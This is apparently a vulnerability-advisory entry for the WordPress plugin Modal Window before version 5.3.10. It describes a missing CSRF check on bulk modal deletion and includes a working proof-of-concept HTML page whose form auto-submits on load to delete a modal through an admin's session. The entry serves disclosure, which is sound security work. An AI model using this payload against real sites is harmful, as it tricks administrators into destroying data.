Lucene search

K
wpexploitBob MatyasWPEX-ID:D42F74DD-520F-40AA-9CF0-3544DB9562C7
HistoryApr 11, 2024 - 12:00 a.m.

Modal Window < 5.3.10 - Modal Deletion via CSRF

2024-04-1100:00:00
Bob Matyas
30
modal window
csrf
deletion
exploit
april 25 2024
update

AI Score

6.7

Confidence

Low

EPSS

0

Percentile

9.0%

Description The plugin does not have CSRF check in place when bulk deleting modals, which could allow attackers to make a logged in admin delete them via a CSRF attack

Have a logged in admin open an HTML file containing where `ID` is an existing modal: 

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=modal-window" method="POST">
        <input type="text" name="ID" value="1" />
        <input type="text" name="action" value="delete-items" />
        <input type="text" name="action2" value="delete-items" />
        action
        <input type="submit" value="submit">
    </form>
</body>
```

AI Score

6.7

Confidence

Low

EPSS

0

Percentile

9.0%

Related for WPEX-ID:D42F74DD-520F-40AA-9CF0-3544DB9562C7